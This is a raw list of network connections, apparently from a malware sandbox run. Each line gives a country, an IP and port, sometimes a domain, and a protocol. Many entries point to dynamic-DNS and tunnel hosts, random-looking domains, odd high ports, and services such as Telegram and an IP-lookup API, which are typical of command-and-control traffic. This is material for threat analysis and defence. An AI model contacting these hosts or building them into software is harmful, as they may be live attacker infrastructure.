DE 185.218.125.157:21441 tcp
IR 46.248.34.105:40500 udp
BG 195.230.23.72:80 tcp
US 8.8.8.8:53 105.34.248.46.in-addr.arpa udp
DE 185.218.125.157:21441 tcp
CN 183.57.21.131:8095 tcp
DE 185.218.125.157:21441 tcp
NL 38.180.123.95:3232 tcp
DE 193.161.193.99:25170 tcp
MX 201.114.202.249:40500 udp
DE 185.218.125.157:21441 tcp
US 147.185.221.22:49922 educational-reform.gl.at.ply.gg tcp
US 8.8.8.8:53 249.202.114.201.in-addr.arpa udp
DE 185.218.125.157:21441 tcp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
DE 185.218.125.157:21441 tcp
CA 158.69.12.143:7771 camp.zapto.org tcp
DE 185.218.125.157:21441 tcp
KZ 5.251.95.166:40500 udp
DE 193.161.193.99:25170 tcp
N/A 127.0.0.1:8777 tcp
US 8.8.8.8:53 166.95.251.5.in-addr.arpa udp
DE 185.218.125.157:21441 tcp
US 147.185.221.23:58963 login-donor.gl.at.ply.gg tcp
DE 185.218.125.157:21441 tcp
IR 2.181.206.190:40500 udp
RU 185.215.113.209:80 185.215.113.209 tcp
US 20.83.148.22:80 tcp
DE 193.161.193.99:25170 tcp
DE 185.218.125.157:21441 tcp
US 8.8.8.8:53 190.206.181.2.in-addr.arpa udp
DE 185.218.125.157:21441 tcp
CA 158.69.12.143:7771 camp.zapto.org tcp
RU 185.215.113.67:21405 tcp
N/A 127.0.0.1:58963 tcp
DE 185.218.125.157:21441 tcp
IR 151.232.164.243:40500 udp
DE 185.218.125.157:21441 tcp
US 8.8.8.8:53 243.164.232.151.in-addr.arpa udp
DE 193.161.193.99:25170 tcp
N/A 127.0.0.1:8777 tcp
DE 185.218.125.157:21441 tcp
KZ 37.151.202.166:40500 tcp
BG 195.230.23.72:80 tcp
RU 185.215.113.209:80 185.215.113.209 tcp
BG 195.230.23.72:80 tcp
BG 195.230.23.72:80 tcp
GB 20.26.156.215:443 github.com tcp
DE 185.218.125.157:21441 tcp
UZ 90.156.167.42:40500 udp
HK 43.155.93.125:80 43.155.93.125 tcp
CA 158.69.12.143:7771 camp.zapto.org tcp
US 8.8.8.8:53 42.167.156.90.in-addr.arpa udp
US 185.199.111.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 125.93.155.43.in-addr.arpa udp
DE 185.218.125.157:21441 tcp
US 26.185.184.104:942 tcp
DE 193.161.193.99:25170 tcp
DE 185.218.125.157:21441 tcp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
NL 38.180.123.95:3232 tcp
IR 2.181.170.246:40500 udp
US 8.8.8.8:53 246.170.181.2.in-addr.arpa udp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
DE 193.161.193.99:25170 tcp
CA 158.69.12.143:7771 camp.zapto.org tcp
US 147.185.221.22:49922 educational-reform.gl.at.ply.gg tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
DE 193.161.193.99:25170 tcp
US 20.83.148.22:8080 20.83.148.22 tcp
BG 195.230.23.72:80 tcp
CN 183.57.21.131:8095 tcp
DE 185.218.125.157:21441 tcp
US 147.185.221.23:58963 login-donor.gl.at.ply.gg tcp
CA 158.69.12.143:7771 camp.zapto.org tcp
DE 185.218.125.157:21441 tcp
US 20.83.148.22:80 tcp
RU 185.215.113.67:21405 tcp
US 20.83.148.22:80 tcp
DE 193.161.193.99:25170 tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
DE 185.218.125.157:21441 tcp
US 8.8.8.8:53 thighpecr.cyou udp
US 8.8.8.8:53 seallysl.site udp
US 8.8.8.8:53 opposezmny.site udp
KZ 37.99.54.230:40500 tcp
US 8.8.8.8:53 goalyfeastz.site udp
KZ 89.218.186.142:40500 udp
US 8.8.8.8:53 contemteny.site udp
US 8.8.8.8:53 dilemmadu.site udp
US 8.8.8.8:53 faulteyotk.site udp
US 8.8.8.8:53 authorisev.site udp
US 8.8.8.8:53 servicedny.site udp
DE 185.218.125.157:21441 tcp
US 8.8.8.8:53 steamcommunity.com udp
NL 92.122.63.136:443 steamcommunity.com tcp
N/A 127.0.0.1:8777 tcp
US 8.8.8.8:53 142.186.218.89.in-addr.arpa udp
US 8.8.8.8:53 136.63.122.92.in-addr.arpa udp
BG 195.230.23.72:80 tcp
DE 193.161.193.99:25170 tcp
CN 183.57.21.131:8095 tcp
US 26.185.184.104:942 tcp
NL 38.180.123.95:3232 tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
CA 158.69.12.143:7771 camp.zapto.org tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
IR 2.189.231.17:40500 udp
US 8.8.8.8:53 www.google.com udp
FR 172.217.20.164:443 www.google.com tcp
US 8.8.8.8:53 17.231.189.2.in-addr.arpa udp
US 8.8.8.8:53 67.213.58.216.in-addr.arpa udp
FR 172.217.20.164:443 www.google.com tcp
FR 172.217.20.164:443 www.google.com tcp
FR 172.217.20.164:443 www.google.com tcp
DE 193.161.193.99:25170 tcp
DE 185.218.125.157:21441 tcp
N/A 127.0.0.1:8777 tcp
SY 5.134.251.133:40500 udp
DE 185.218.125.157:21441 tcp
US 8.8.8.8:53 133.251.134.5.in-addr.arpa udp
US 8.8.8.8:53 claywyaeropumps.com udp
US 147.185.221.22:49922 educational-reform.gl.at.ply.gg tcp
BG 195.230.23.72:80 tcp
BG 195.230.23.72:80 tcp
IR 2.187.89.214:40500 udp
RU 31.41.244.9:80 31.41.244.9 tcp
US 208.95.112.1:80 ip-api.com tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
US 8.8.8.8:53 clients2.google.com udp
US 8.8.8.8:53 214.89.187.2.in-addr.arpa udp
FR 172.217.20.206:443 clients2.google.com tcp
FR 172.217.20.206:443 clients2.google.com tcp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
FR 172.217.20.164:443 www.google.com tcp
FR 172.217.20.164:443 www.google.com tcp
FR 172.217.20.164:443 www.google.com tcp
FR 172.217.20.164:443 www.google.com tcp
RU 185.215.113.67:21405 tcp
AO 129.122.141.24:40500 udp
US 8.8.8.8:53 24.141.122.129.in-addr.arpa udp
US 8.8.8.8:53 camp.zapto.org udp
CA 158.69.12.143:7771 camp.zapto.org tcp
DE 193.161.193.99:25170 tcp
SY 82.137.239.235:40500 udp
DE 185.218.125.157:21441 tcp
UZ 93.188.85.2:40500 tcp
N/A 127.0.0.1:8777 tcp
NL 38.180.123.95:3232 tcp
US 8.8.8.8:53 235.239.137.82.in-addr.arpa udp
DE 41.216.183.9:8080 tcp
BG 195.230.23.72:80 tcp
US 20.83.148.22:80 tcp
US 26.185.184.104:942 tcp
FR 172.217.20.164:443 www.google.com tcp
US 8.8.8.8:53 grupodulcemar.pe udp
FR 172.217.20.164:443 www.google.com tcp
FR 172.217.20.164:443 www.google.com tcp
FR 172.217.20.164:443 www.google.com tcp
DE 185.218.125.157:21441 tcp
PE 161.132.57.101:80 grupodulcemar.pe tcp
DE 185.218.125.157:21441 tcp
FR 172.217.20.206:443 clients2.google.com tcp
FR 172.217.20.206:443 clients2.google.com tcp
RU 185.215.113.43:80 185.215.113.43 tcp
DE 185.218.125.157:21441 tcp
IR 217.171.148.45:40500 udp
US 147.185.221.22:49922 educational-reform.gl.at.ply.gg tcp
BG 195.230.23.72:80 tcp
US 8.8.8.8:53 45.148.171.217.in-addr.arpa udp
US 8.8.8.8:53 www.google.com udp
BG 195.230.23.72:80 tcp
DE 193.161.193.99:25170 tcp
FR 172.217.20.164:443 www.google.com tcp
FR 172.217.20.164:443 www.google.com tcp
FR 172.217.20.164:443 www.google.com tcp
FR 172.217.20.164:443 www.google.com tcp
RU 31.41.244.11:80 31.41.244.11 tcp
US 8.8.8.8:53 login-donor.gl.at.ply.gg udp
US 147.185.221.23:58963 login-donor.gl.at.ply.gg tcp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
KR 45.154.14.21:7777 45.154.14.21 tcp
DE 209.38.221.184:8080 209.38.221.184 tcp
KZ 95.58.91.70:40500 udp
DE 46.235.26.83:8080 tcp
DE 185.218.125.157:21441 tcp
US 8.8.8.8:53 70.91.58.95.in-addr.arpa udp
US 8.8.8.8:53 21.14.154.45.in-addr.arpa udp
CA 158.69.12.143:7771 camp.zapto.org tcp
N/A 127.0.0.1:8777 tcp
N/A 127.0.0.1:8777 tcp
DE 193.161.193.99:25170 tcp
DE 185.218.125.157:21441 tcp
UZ 90.156.164.120:40500 udp
US 8.8.8.8:53 120.164.156.90.in-addr.arpa udp
RU 185.215.113.67:21405 tcp
DE 185.218.125.157:21441 tcp
BG 195.230.23.72:80 tcp
CA 158.69.12.143:7771 camp.zapto.org tcp
RU 31.41.244.11:80 31.41.244.11 tcp
FR 172.217.20.164:443 www.google.com tcp
DE 147.28.185.29:80 147.28.185.29 tcp
BG 195.230.23.72:80 tcp
FR 172.217.20.164:443 www.google.com tcp
FR 172.217.20.164:443 www.google.com tcp
FR 172.217.20.164:443 www.google.com tcp
NL 38.180.123.95:3232 tcp
NL 206.166.251.4:8080 tcp
DE 185.218.125.157:21441 tcp
EG 62.114.143.56:40500 tcp
DE 94.156.177.33:80 94.156.177.33 tcp
US 8.8.8.8:53 29.185.28.147.in-addr.arpa udp
DE 193.161.193.99:25170 tcp
US 26.185.184.104:942 tcp
DE 185.218.125.157:21441 tcp
KZ 37.99.52.150:40500 udp
DE 185.218.125.157:21441 tcp
US 8.8.8.8:53 150.52.99.37.in-addr.arpa udp
N/A 127.0.0.1:8777 tcp
DE 193.161.193.99:25170 tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
BG 195.230.23.72:80 tcp
UZ 90.156.162.106:40500 udp
RU 185.215.113.43:80 185.215.113.43 tcp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
CA 158.69.12.143:7771 camp.zapto.org tcp
NL 89.110.69.103:80 tcp
FR 172.217.20.164:443 www.google.com tcp
DE 185.218.125.157:21441 tcp
US 8.8.8.8:53 106.162.156.90.in-addr.arpa udp
FR 172.217.20.164:443 www.google.com tcp
FR 172.217.20.164:443 www.google.com tcp
FR 172.217.20.164:443 www.google.com tcp
US 20.83.148.22:80 tcp
US 147.185.221.22:49922 educational-reform.gl.at.ply.gg tcp
FR 51.159.4.50:8080 51.159.4.50 tcp
DE 185.218.125.157:21441 tcp
US 8.8.8.8:53 50.4.159.51.in-addr.arpa udp
DE 193.161.193.99:25170 tcp
US 20.83.148.22:80 tcp
NL 89.110.69.103:80 tcp
RU 45.150.24.42:40500 udp
DE 185.218.125.157:21441 tcp
US 8.8.8.8:53 42.24.150.45.in-addr.arpa udp
DE 185.218.125.157:21441 tcp
N/A 127.0.0.1:8777 tcp
NL 178.132.2.10:4000 tcp
KZ 95.59.162.2:40500 udp
US 8.8.8.8:53 beacons.gcp.gvt2.com udp
GB 142.250.187.195:443 beacons.gcp.gvt2.com tcp
GB 142.250.187.195:443 beacons.gcp.gvt2.com tcp
GB 142.250.187.195:443 beacons.gcp.gvt2.com tcp
US 8.8.8.8:53 195.187.250.142.in-addr.arpa udp
DE 167.235.70.96:8080 tcp
DE 185.218.125.157:21441 tcp
BG 195.230.23.72:80 tcp
BG 195.230.23.72:80 tcp
FR 172.217.20.164:443 www.google.com tcp
FR 172.217.20.164:443 www.google.com tcp
FR 172.217.20.164:443 www.google.com tcp
RU 185.215.113.67:21405 tcp
FR 172.217.20.164:443 www.google.com tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
NL 38.180.123.95:3232 tcp
YE 94.26.196.74:40500 udp
SY 82.137.244.65:40500 tcp
DE 185.218.125.157:21441 tcp
US 8.8.8.8:53 74.196.26.94.in-addr.arpa udp
DE 193.161.193.99:25170 tcp
US 26.185.184.104:942 tcp
CA 158.69.12.143:7771 camp.zapto.org tcp
DE 185.218.125.157:21441 tcp
US 147.185.221.23:58963 login-donor.gl.at.ply.gg tcp
N/A 127.0.0.1:8777 tcp
N/A 127.0.0.1:8777 tcp
N/A 127.0.0.1:8777 tcp
N/A 127.0.0.1:8777 tcp
N/A 127.0.0.1:8777 tcp
N/A 127.0.0.1:8777 tcp
N/A 127.0.0.1:8777 tcp
N/A 127.0.0.1:8777 tcp
N/A 127.0.0.1:8777 tcp
N/A 127.0.0.1:8777 tcp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
IR 2.176.119.113:40500 udp
US 8.8.8.8:53 113.119.176.2.in-addr.arpa udp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
DE 193.161.193.99:25170 tcp
BG 195.230.23.72:80 tcp
YE 78.137.64.239:40500 udp
US 8.8.8.8:53 239.64.137.78.in-addr.arpa udp
BG 195.230.23.72:80 tcp
DE 194.164.198.113:8080 tcp
FR 172.217.20.164:443 www.google.com tcp
US 8.8.8.8:53 camp.zapto.org udp
DE 185.218.125.157:21441 tcp
CA 158.69.12.143:7771 camp.zapto.org tcp
FR 172.217.20.164:443 www.google.com tcp
FR 172.217.20.164:443 www.google.com tcp
FR 172.217.20.164:443 www.google.com tcp
US 8.8.8.8:53 educational-reform.gl.at.ply.gg udp
US 147.185.221.22:49922 educational-reform.gl.at.ply.gg tcp
DE 185.218.125.157:21441 tcp
N/A 127.0.0.1:8777 tcp
DE 185.218.125.157:21441 tcp
DE 193.161.193.99:25170 tcp
SY 95.212.120.220:40500 udp
US 8.8.8.8:53 220.120.212.95.in-addr.arpa udp
DE 185.218.125.157:21441 tcp
N/A 127.0.0.1:8777 tcp
DE 185.218.125.157:21441 tcp
GB 132.145.17.167:9090 132.145.17.167 tcp
FR 172.217.20.164:443 www.google.com tcp
FR 172.217.20.164:443 www.google.com tcp
US 20.83.148.22:80 tcp
BG 195.230.23.72:80 tcp
UZ 93.188.86.253:40500 udp
US 8.8.8.8:53 167.17.145.132.in-addr.arpa udp
US 8.8.8.8:53 253.86.188.93.in-addr.arpa udp
DE 185.218.125.157:21441 tcp
FR 172.217.20.164:443 www.google.com tcp
FR 172.217.20.164:443 www.google.com tcp
FR 172.217.20.164:443 www.google.com tcp
US 8.8.8.8:53 api.telegram.org udp
CA 158.69.12.143:7771 camp.zapto.org tcp
NL 149.154.167.220:443 api.telegram.org tcp
RU 185.215.113.67:21405 tcp
N/A 127.0.0.1:8777 tcp
DE 185.218.125.157:21441 tcp
US 8.8.8.8:53 zaZEComvggHsSEuOVnvSMAnVIZblq.zaZEComvggHsSEuOVnvSMAnVIZblq udp
NL 38.180.123.95:3232 tcp
US 8.8.8.8:53 sanboxland.pro udp
GB 89.35.131.209:80 sanboxland.pro tcp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
DE 185.218.125.157:21441 tcp
DE 193.161.193.99:25170 tcp
DZ 41.102.19.3:40500 tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
CA 158.69.12.143:7771 camp.zapto.org tcp
BG 195.230.23.72:80 tcp
DE 185.218.125.157:21441 tcp
GB 89.35.131.209:80 sanboxland.pro tcp
US 26.185.184.104:942 tcp
DE 193.161.193.99:25170 tcp
FR 172.217.20.164:443 www.google.com tcp
FR 172.217.20.164:443 www.google.com tcp
FR 172.217.20.164:443 www.google.com tcp
FR 172.217.20.164:443 www.google.com tcp
BG 195.230.23.72:80 tcp
DE 185.218.125.157:21441 tcp
NL 149.154.167.220:443 api.telegram.org tcp
YE 178.130.96.97:40500 udp
DE 185.218.125.157:21441 tcp
US 8.8.8.8:53 97.96.130.178.in-addr.arpa udp
DE 185.218.125.157:21441 tcp
DE 193.161.193.99:25170 tcp
US 147.185.221.22:49922 educational-reform.gl.at.ply.gg tcp
BA 77.221.20.139:40500 udp
CA 158.69.12.143:7771 camp.zapto.org tcp
DE 185.218.125.157:21441 tcp
US 147.185.221.23:58963 login-donor.gl.at.ply.gg tcp
US 8.8.8.8:53 139.20.221.77.in-addr.arpa udp
BG 195.230.23.72:80 tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
BG 195.230.23.72:80 tcp
FR 172.217.20.164:443 www.google.com tcp
DE 185.218.125.157:21441 tcp
FR 172.217.20.164:443 www.google.com tcp
FR 172.217.20.164:443 www.google.com tcp
FR 172.217.20.164:443 www.google.com tcp
DE 193.161.193.99:25170 tcp
IR 2.176.90.19:40500 udp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
US 8.8.8.8:53 19.90.176.2.in-addr.arpa udp
DE 41.216.183.9:8080 tcp
DE 209.38.221.184:8080 209.38.221.184 tcp
DE 46.235.26.83:8080 tcp
DE 185.218.125.157:21441 tcp
NL 38.180.123.95:3232 tcp
RU 185.215.113.67:21405 tcp
CA 158.69.12.143:7771 camp.zapto.org tcp
DE 185.218.125.157:21441 tcp
KZ 88.151.180.214:40500 udp
N/A 127.0.0.1:8777 tcp
N/A 127.0.0.1:8777 tcp
DE 193.161.193.99:25170 tcp
DE 185.218.125.157:21441 tcp
US 8.8.8.8:53 214.180.151.88.in-addr.arpa udp
DE 185.218.125.157:21441 tcp
N/A 127.0.0.1:8777 tcp
N/A 127.0.0.1:8777 tcp
N/A 127.0.0.1:8777 tcp
N/A 127.0.0.1:8777 tcp
N/A 127.0.0.1:8777 tcp
N/A 127.0.0.1:8777 tcp
N/A 127.0.0.1:8777 tcp
N/A 127.0.0.1:8777 tcp
N/A 127.0.0.1:8777 tcp
N/A 127.0.0.1:8777 tcp
N/A 127.0.0.1:8777 tcp
IR 94.183.35.46:40500 tcp
US 20.83.148.22:80 tcp
N/A 127.0.0.1:8777 tcp
IR 2.176.109.189:40500 udp
DE 185.218.125.157:21441 tcp
US 8.8.8.8:53 189.109.176.2.in-addr.arpa udp
DE 147.28.185.29:80 147.28.185.29 tcp
NL 206.166.251.4:8080 tcp
N/A 127.0.0.1:8777 tcp
N/A 127.0.0.1:8777 tcp
N/A 127.0.0.1:8777 tcp
DE 193.161.193.99:25170 tcp
BG 195.230.23.72:80 tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
N/A 127.0.0.1:8777 tcp
N/A 127.0.0.1:8777 tcp
DE 185.218.125.157:21441 tcp
CA 158.69.12.143:7771 camp.zapto.org tcp
IR 2.190.67.184:40500 udp
US 8.8.8.8:53 184.67.190.2.in-addr.arpa udp
US 26.185.184.104:942 tcp
DE 193.161.193.99:25170 tcp
BG 195.230.23.72:80 tcp
US 20.83.148.22:80 tcp
DE 185.218.125.157:21441 tcp
BG 195.230.23.72:80 tcp
US 147.185.221.22:49922 educational-reform.gl.at.ply.gg tcp
DE 185.218.125.157:21441 tcp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
FR 51.159.4.50:8080 51.159.4.50 tcp
DE 185.218.125.157:21441 tcp
NL 149.154.167.220:443 api.telegram.org tcp
DE 185.218.125.157:21441 tcp
CA 158.69.12.143:7771 camp.zapto.org tcp
N/A 127.0.0.1:8777 tcp
DE 193.161.193.99:25170 tcp
UZ 195.158.22.4:40500 udp
US 8.8.8.8:53 4.22.158.195.in-addr.arpa udp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
NL 38.180.123.95:3232 tcp
DE 185.218.125.157:21441 tcp
DE 193.161.193.99:25170 tcp
UZ 217.30.162.37:40500 udp
US 8.8.8.8:53 claywyaeropumps.com udp
RU 185.215.113.67:21405 tcp
N/A 127.0.0.1:8777 tcp
US 8.8.8.8:53 37.162.30.217.in-addr.arpa udp
US 8.8.8.8:53 camp.zapto.org udp
CA 158.69.12.143:7771 camp.zapto.org tcp
US 147.185.221.23:58963 login-donor.gl.at.ply.gg tcp
N/A 127.0.0.1:8777 tcp
DE 185.218.125.157:21441 tcp
UZ 90.156.160.86:40500 tcp
N/A 127.0.0.1:9222 tcp
MX 189.191.143.93:40500 udp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
DE 193.161.193.99:25170 tcp
US 8.8.8.8:53 93.143.191.189.in-addr.arpa udp
DE 185.218.125.157:21441 tcp
IR 2.176.92.74:40500 udp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
US 8.8.8.8:53 74.92.176.2.in-addr.arpa udp
DE 185.218.125.157:21441 tcp
DE 193.161.193.99:25170 tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
US 26.185.184.104:942 tcp
CA 158.69.12.143:7771 camp.zapto.org tcp
US 20.83.148.22:80 tcp
DE 41.216.183.9:8080 tcp
DE 185.218.125.157:21441 tcp
BG 195.230.23.72:80 tcp
N/A 127.0.0.1:8777 tcp
SY 82.137.218.134:40500 udp
US 147.185.221.22:49922 educational-reform.gl.at.ply.gg tcp
US 8.8.8.8:53 134.218.137.82.in-addr.arpa udp
DE 209.38.221.184:8080 209.38.221.184 tcp
DE 46.235.26.83:8080 tcp
DE 193.161.193.99:25170 tcp
DE 185.218.125.157:21441 tcp
MX 189.167.44.219:40500 udp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
US 8.8.8.8:53 219.44.167.189.in-addr.arpa udp
DE 185.218.125.157:21441 tcp
NL 38.180.123.95:3232 tcp
N/A 127.0.0.1:8777 tcp
DE 193.161.193.99:25170 tcp
IR 5.238.93.200:40500 udp
CA 158.69.12.143:7771 camp.zapto.org tcp
US 8.8.8.8:53 200.93.238.5.in-addr.arpa udp
DE 185.218.125.157:21441 tcp
RU 185.215.113.67:21405 tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
US 147.185.221.23:58963 login-donor.gl.at.ply.gg tcp
DE 185.218.125.157:21441 tcp
DE 193.161.193.99:25170 tcp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
US 198.163.204.6:40500 tcp
CA 158.69.12.143:7771 camp.zapto.org tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
DE 193.161.193.99:25170 tcp
DE 185.218.125.157:21441 tcp
US 8.8.8.8:53 peerhost59mj7i6macla65r.com udp
NL 94.154.172.218:443 peerhost59mj7i6macla65r.com tcp
NL 94.154.172.218:443 peerhost59mj7i6macla65r.com tcp
CA 158.69.12.143:7771 camp.zapto.org tcp
DE 185.218.125.157:21441 tcp
US 26.185.184.104:942 tcp
DE 193.161.193.99:25170 tcp
DE 185.218.125.157:21441 tcp
US 147.185.221.22:49922 educational-reform.gl.at.ply.gg tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
CA 158.69.12.143:7771 camp.zapto.org tcp
RU 37.78.33.95:40500 udp
US 8.8.8.8:53 95.33.78.37.in-addr.arpa udp
NL 38.180.123.95:3232 tcp
NL 94.154.172.218:443 peerhost59mj7i6macla65r.com tcp
DE 193.161.193.99:25170 tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
N/A 127.0.0.1:8777 tcp
DE 185.218.125.157:21441 tcp
IR 5.219.44.252:40500 udp
DE 185.218.125.157:21441 tcp
US 8.8.8.8:53 252.44.219.5.in-addr.arpa udp
N/A 127.0.0.1:8777 tcp
RU 185.215.113.67:21405 tcp
CA 158.69.12.143:7771 camp.zapto.org tcp
DE 193.161.193.99:25170 tcp
N/A 172.16.16.140:40500 udp
US 8.8.8.8:53 140.16.16.172.in-addr.arpa udp
DE 185.218.125.157:21441 tcp
N/A 127.0.0.1:8777 tcp
N/A 127.0.0.1:8777 tcp
N/A 127.0.0.1:8777 tcp
US 147.185.221.23:58963 login-donor.gl.at.ply.gg tcp
UZ 87.237.234.195:40500 tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
N/A 127.0.0.1:8777 tcp
DE 185.218.125.157:21441 tcp
NL 178.132.2.10:4000 tcp
DE 193.161.193.99:25170 tcp
N/A 127.0.0.1:8777 tcp
N/A 127.0.0.1:8777 tcp
IR 151.243.58.90:40500 udp
US 8.8.8.8:53 90.58.243.151.in-addr.arpa udp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
US 8.8.8.8:53 camp.zapto.org udp
CA 158.69.12.143:7771 camp.zapto.org tcp
DE 185.218.125.157:21441 tcp
UZ 90.156.161.82:40500 udp
US 8.8.8.8:53 82.161.156.90.in-addr.arpa udp
DE 193.161.193.99:25170 tcp
US 26.185.184.104:942 tcp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
US 147.185.221.22:49922 educational-reform.gl.at.ply.gg tcp
NL 38.180.123.95:3232 tcp
DE 185.218.125.157:21441 tcp
N/A 127.0.0.1:8777 tcp
N/A 127.0.0.1:8777 tcp
N/A 127.0.0.1:8777 tcp
N/A 127.0.0.1:8777 tcp
N/A 127.0.0.1:8777 tcp
DE 193.161.193.99:25170 tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
RU 185.215.113.67:21405 tcp
DE 185.218.125.157:21441 tcp
CA 158.69.12.143:7771 camp.zapto.org tcp
DE 185.218.125.157:21441 tcp
UZ 90.156.160.56:40500 udp
N/A 127.0.0.1:8777 tcp
N/A 127.0.0.1:8777 tcp
DE 193.161.193.99:25170 tcp
US 8.8.8.8:53 56.160.156.90.in-addr.arpa udp
IR 188.212.88.213:40500 tcp
DE 185.218.125.157:21441 tcp
N/A 127.0.0.1:8777 tcp
N/A 127.0.0.1:9222 tcp
N/A 127.0.0.1:8777 tcp
N/A 127.0.0.1:8777 tcp
N/A 127.0.0.1:8777 tcp
N/A 127.0.0.1:8777 tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
DE 193.161.193.99:25170 tcp
DE 185.218.125.157:21441 tcp
CA 158.69.12.143:7771 camp.zapto.org tcp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
DE 185.218.125.157:21441 tcp
DE 193.161.193.99:25170 tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
PK 124.109.48.132:40500 udp
US 147.185.221.22:49922 educational-reform.gl.at.ply.gg tcp
NL 38.180.123.95:3232 tcp
US 8.8.8.8:53 132.48.109.124.in-addr.arpa udp
US 147.185.221.23:58963 login-donor.gl.at.ply.gg tcp
US 26.185.184.104:942 tcp
DE 185.218.125.157:21441 tcp
N/A 127.0.0.1:8777 tcp
DE 193.161.193.99:25170 tcp
KZ 95.58.216.162:40500 udp
US 8.8.8.8:53 162.216.58.95.in-addr.arpa udp
DE 185.218.125.157:21441 tcp
CA 158.69.12.143:7771 camp.zapto.org tcp
N/A 127.0.0.1:8777 tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
RU 185.215.113.67:21405 tcp
MX 187.235.157.13:40500 udp
DE 193.161.193.99:25170 tcp
DE 185.218.125.157:21441 tcp
US 8.8.8.8:53 13.157.235.187.in-addr.arpa udp
N/A 127.0.0.1:8777 tcp
CA 158.69.12.143:7771 camp.zapto.org tcp
DE 185.218.125.157:21441 tcp
IR 217.171.148.45:40500 tcp
DE 185.218.125.157:21441 tcp
N/A 127.0.0.1:8777 tcp
N/A 127.0.0.1:8777 tcp
DE 185.218.125.157:21441 tcp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
IR 2.179.60.101:40500 udp
US 8.8.8.8:53 101.60.179.2.in-addr.arpa udp
DE 193.161.193.99:25170 tcp
DE 185.218.125.157:21441 tcp
RU 78.37.229.249:40500 udp
N/A 127.0.0.1:8777 tcp
DE 185.218.125.157:21441 tcp
US 8.8.8.8:53 249.229.37.78.in-addr.arpa udp
DE 193.161.193.99:25170 tcp
CA 158.69.12.143:7771 camp.zapto.org tcp
DE 185.218.125.157:21441 tcp
N/A 127.0.0.1:8777 tcp
N/A 127.0.0.1:8777 tcp
NL 38.180.123.95:3232 tcp
KZ 89.218.186.86:40500 udp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
US 8.8.8.8:53 86.186.218.89.in-addr.arpa udp
US 147.185.221.22:49922 educational-reform.gl.at.ply.gg tcp
DE 193.161.193.99:25170 tcp
US 8.8.8.8:53 camp.zapto.org udp
CA 158.69.12.143:7771 camp.zapto.org tcp
DE 185.218.125.157:21441 tcp
US 26.185.184.104:942 tcp
US 147.185.221.23:58963 login-donor.gl.at.ply.gg tcp
KZ 95.59.165.102:40500 udp
US 8.8.8.8:53 102.165.59.95.in-addr.arpa udp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
DE 193.161.193.99:25170 tcp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
N/A 127.0.0.1:8777 tcp
N/A 127.0.0.1:9222 tcp
RU 185.215.113.67:21405 tcp
DE 185.218.125.157:21441 tcp
N/A 127.0.0.1:8777 tcp
DE 185.218.125.157:21441 tcp
N/A 127.0.0.1:8777 tcp
KZ 92.46.228.246:40500 tcp
CA 158.69.12.143:7771 camp.zapto.org tcp
RU 178.206.158.183:40500 udp
DE 185.218.125.157:21441 tcp
DE 193.161.193.99:25170 tcp
US 8.8.8.8:53 183.158.206.178.in-addr.arpa udp
DE 185.218.125.157:21441 tcp
US 8.8.8.8:53 claywyaeropumps.com udp
DE 185.218.125.157:21441 tcp
DE 193.161.193.99:25170 tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
NL 38.180.123.95:3232 tcp
CA 158.69.12.143:7771 camp.zapto.org tcp
N/A 127.0.0.1:8777 tcp
DE 185.218.125.157:21441 tcp
DE 193.161.193.99:25170 tcp
DE 185.218.125.157:21441 tcp
